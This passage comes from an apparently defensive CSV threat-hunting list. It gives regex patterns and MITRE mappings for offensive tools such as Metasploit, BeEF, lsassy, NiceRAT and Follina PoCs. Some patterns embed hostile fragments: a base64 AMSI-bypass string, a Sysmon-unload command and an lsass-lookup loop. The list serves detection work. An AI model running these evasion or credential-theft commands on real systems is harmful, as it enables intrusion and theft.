Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","45137" "*fireeye*commando*",".{0,1000}fireeye.{0,1000}commando.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","N/A","10","7168","1313","2024-09-24T19:14:18Z","2019-03-26T22:36:32Z","45138" "*FireFart*dirtycow*",".{0,1000}FireFart.{0,1000}dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","N/A","9","884","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z","45139" "*firefox/FakeUpdate_files/*",".{0,1000}firefox\/FakeUpdate_files\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","45140" "*firefox_decrypt.py*",".{0,1000}firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","45141" 
"*firefox_decrypt-main*",".{0,1000}firefox_decrypt\-main.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","45142" "*firefox_extension_bindshell*",".{0,1000}firefox_extension_bindshell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","45143" "*firefox_extension_reverse_shell*",".{0,1000}firefox_extension_reverse_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","45144" "*firefox_privilege_escalation.rb*",".{0,1000}firefox_privilege_escalation\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45145" "*firefox_privilege_escalation_spec.rb*",".{0,1000}firefox_privilege_escalation_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45146" "*firefox_smil_uaf*",".{0,1000}firefox_smil_uaf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","45147" "*FireListener.ps1*",".{0,1000}FireListener\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","45148" "*Firesheep/*",".{0,1000}Firesheep\/.{0,1000}","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45149" "*Firewall_Walker_BOF*",".{0,1000}Firewall_Walker_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","N/A","10","10","103","15","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z","45157" "*fishing_with_hollowing*",".{0,1000}fishing_with_hollowing.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","N/A","10","10","122","15","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z","45158" "*FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==*",".{0,1000}FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","45159" "*fkasler/cuddlephish*",".{0,1000}fkasler\/cuddlephish.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & 
Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","45161" "*Flangvik/NetLoader*",".{0,1000}Flangvik\/NetLoader.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","45162" "*Flangvik/ObfuscatedSharpCollection*",".{0,1000}Flangvik\/ObfuscatedSharpCollection.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","45163" "*Flangvik/SharpAppLocker*",".{0,1000}Flangvik\/SharpAppLocker.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","1","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","45164" "*Flangvik/SharpCollection*",".{0,1000}Flangvik\/SharpCollection.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","45165" "*Flangvik/SharpExfiltrate*",".{0,1000}Flangvik\/SharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","N/A","10","2","126","37","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z","45166" "*Flangvik/TeamFiltration*",".{0,1000}Flangvik\/TeamFiltration.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","45167" "*flashupdate.ps1*",".{0,1000}flashupdate\.ps1.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation 
tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","45168" "*flipt-io/reverst*",".{0,1000}flipt\-io\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","45177" "*flipt-io/reverst*",".{0,1000}flipt\-io\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","45178" "*floesen/EventLogCrasher*",".{0,1000}floesen\/EventLogCrasher.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","N/A","10","2","186","34","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z","45179" "*floesen/KExecDD*",".{0,1000}floesen\/KExecDD.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","1","N/A","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","45180" "*florylsk/NtRemoteLoad*",".{0,1000}florylsk\/NtRemoteLoad.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation 
tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","45181" "*fltMC* unload SysmonDrv*",".{0,1000}fltMC.{0,1000}\sunload\sSysmonDrv.{0,1000}","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","45182" "*FluxionNetwork*",".{0,1000}FluxionNetwork.{0,1000}","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. 
Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","N/A","10","5207","1430","2023-11-03T23:16:30Z","2017-04-29T10:22:27Z","45183" "*fnjhmkhhmkbjkkabndcnnogagogbneec*",".{0,1000}fnjhmkhhmkbjkkabndcnnogagogbneec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45184" "*fnnegphlobjdpkhecapkijjdkgcjhkib*",".{0,1000}fnnegphlobjdpkhecapkijjdkgcjhkib.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","45185" "*fodhelperbypass*",".{0,1000}fodhelperbypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation 
tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45186" "*fodhelperUACBypass*",".{0,1000}fodhelperUACBypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45187" "*Follina.Ninja*",".{0,1000}Follina\.Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45189" "*follina.py*muban.docx*",".{0,1000}follina\.py.{0,1000}muban\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","45190" "*Follina/follina.html*",".{0,1000}Follina\/follina\.html.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45191" "*Follina/Follinadoc*",".{0,1000}Follina\/Follinadoc.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","45192" "*follow_attacker_commands.exe*",".{0,1000}follow_attacker_commands\.exe.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","45193" "*follow_attacker_commands.py*",".{0,1000}follow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","45194" "*fopen('credentials.txt'*",".{0,1000}fopen\(\'credentials\.txt\'.{0,1000}","offensive_tool_keyword","PWA-Phishing","Phishing with Progressive Web Apps and UI manipulation","T1071.003 - T1204.002 - T1608.003 - T1071.004","TA0006","N/A","N/A","Phishing","https://github.com/mrd0x/PWA-Phishing","1","0","N/A","N/A","10","3","288","52","2024-06-16T17:47:15Z","2024-06-09T19:47:52Z","45195" "*for /f """"tokens=2 delims= """" %*tasklist /fi """"Imagename eq 
lsass.exe*",".{0,1000}for\s\/f\s\""tokens\=2\sdelims\=\s\""\s\%.{0,1000}tasklist\s\/fi\s\""Imagename\seq\slsass\.exe.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","45196" "*for /f %%i in (C:\Windows\IME\ok.txt)*",".{0,1000}for\s\/f\s\%\%i\sin\s\(C\:\\Windows\\IME\\ok\.txt\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45199" "*for /r c:\windows\system32\ %i in (*sht*.exe)*",".{0,1000}for\s\/r\sc\:\\windows\\system32\\\s\%i\sin\s\(.{0,1000}sht.{0,1000}\.exe\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - 
T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45201" "*For fun and (no) profit : lets hook rtlcomparememory in lsass.exe*",".{0,1000}For\sfun\sand\s\(no\)\sprofit\s\:\slets\shook\srtlcomparememory\sin\slsass\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","45202" "*-force-forwardableet-ADComputer*",".{0,1000}\-force\-forwardableet\-ADComputer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
